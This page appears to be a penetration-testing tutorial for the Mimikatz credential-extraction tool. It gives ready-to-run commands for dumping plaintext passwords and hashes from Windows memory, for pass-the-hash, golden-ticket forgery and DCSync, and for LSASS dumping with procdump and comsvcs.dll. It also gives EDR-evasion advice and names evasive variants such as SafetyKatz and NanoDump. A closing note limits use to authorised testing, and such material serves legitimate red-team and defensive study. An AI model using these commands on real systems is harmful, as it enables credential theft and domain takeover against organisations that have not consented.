Mimikatz — Install, Use, Optimise (2026)

The credential-extraction tool — pulls plaintext passwords, hashes, Kerberos tickets, and certs from Windows memory.

Installation

Pick the install method that matches your stack. The Docker option is the cleanest for one-off scans where you don’t want to pollute your workstation.

Pre-built EXE

Download from github.com/gentilkiwi/mimikatz/releases (heavily AV-flagged)

Compile from source

Visual Studio 2019+ → open mimikatz.sln → Build x64 Release

Pypykatz (Python port, lower detection)

pip install pypykatz

Core commands

The handful of invocations you’ll actually run on 90% of engagements:

Privilege::debug + sekurlsa::logonpasswords

mimikatz # privilege::debug; sekurlsa::logonpasswords

Pass-the-Hash

sekurlsa::pth /user:Administrator /domain:CORP /ntlm:HASH /run:cmd.exe

Golden ticket

kerberos::golden /user:fakeadmin /domain:corp.local /sid:S-1-5-21-... /krbtgt:HASH /id:500

DCSync (replicate creds from DC)

lsadump::dcsync /domain:corp.local /user:Administrator

Pypykatz LSASS dump

pypykatz lsa minidump lsass.dmp

Performance optimisation

What separates a junior who runs the default invocation from a practitioner who knows the knobs:

• Direct execution is detected by every modern AV/EDR. Standard tradecraft: dump LSASS first (procdump, comsvcs.dll), parse offline with pypykatz.
• procdump -ma lsass.exe lsass.dmp requires SeDebugPrivilege but is signed Microsoft binary — bypasses many EDRs.
• comsvcs.dll via rundll32 C:WindowsSystem32comsvcs.dll, MiniDump PID lsass.dmp full — LOLBAS, no upload needed.
• pypykatz parses minidumps offline on the attacker box — no need to run mimikatz on victim.
• For Credential Guard / LSA Protection bypass: kernel driver tricks (Skeleton Key, SafetyKatz). Way out of scope of basic engagements.

Common pitfalls

Real failure modes that bite people on engagements. Most are recoverable; a few are reputation-damaging.

• EVERY EDR vendor detects mimikatz signature, internal strings, AND behaviour. Default binary will not execute on prod EDR.
• LSASS dumping itself is detected — many EDRs alert on any process opening LSASS handle.
• sekurlsa::logonpasswords requires SYSTEM, not just admin. Use token::elevate if needed.
• Storing dumped creds on disk = legal exposure even on authorised engagements. Encrypt + delete.

Modern alternatives in 2026

The ecosystem moves fast. These are tools you should at least be aware of:

• Rubeus — Kerberos-specific (tickets, TGT/TGS).
• SafetyKatz — patched mimikatz with EDR evasion.
• NanoDump — LSASS dumping with built-in evasion.

India context and engagement notes

India-context: many Indian enterprises run unpatched Windows 2012 R2 / 2016 — Wdigest is often still enabled, meaning plaintext passwords in LSASS. Mimikatz on these remains devastatingly effective. Reporting: if you find Wdigest=1, that’s a Critical-severity finding under any framework.

⚖️ Legal: Use only on systems you own or have explicit written authorisation to test. In India, unauthorised access is punishable under Section 66 of the IT Act, 2000 (up to 3 years imprisonment + fine). Pair every engagement with a signed Statement of Work or Rules of Engagement before running anything from this page.